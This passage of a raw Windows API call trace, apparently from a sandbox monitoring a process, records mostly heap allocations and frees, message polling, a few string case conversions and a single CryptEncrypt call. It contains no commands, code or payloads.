Size=0x4) returned 0x2415a48 [0258.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0258.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0258.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0258.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0258.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0258.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0258.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0258.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0258.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0258.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0258.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0258.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0258.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0258.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0258.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0258.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0258.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0258.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0258.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0258.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0258.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0258.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0258.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0258.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0258.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0258.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0258.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0258.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0258.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0258.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.622] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0258.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.622] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.623] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0258.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.623] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0258.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0258.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0258.623] CharLowerBuffW (in: lpsz="byte[89624]", cchLength=0xb | out: lpsz="byte[89624]") returned 0xb [0258.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0258.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0258.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0258.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0258.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0258.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0258.624] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0258.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0258.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0258.625] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0258.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0258.625] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.625] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.626] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.626] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.626] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.626] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0258.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0258.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.626] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34c8070*, pdwDataLen=0x8bef68*=0x15e14, dwBufLen=0x15e18 | out: pbData=0x34c8070*, pdwDataLen=0x8bef68*=0x15e18) returned 1 [0258.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0258.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0258.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0258.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0258.628] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0258.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0258.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0258.629] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.629] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0258.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0258.629] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0258.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0258.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0258.630] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.630] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.630] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0258.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0258.630] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0258.630] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.631] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0258.631] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.631] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0258.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0258.631] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0258.631] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.631] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0258.631] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.631] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.632] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.632] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0258.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0258.632] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.632] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0258.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.632] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.632] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.632] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0258.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 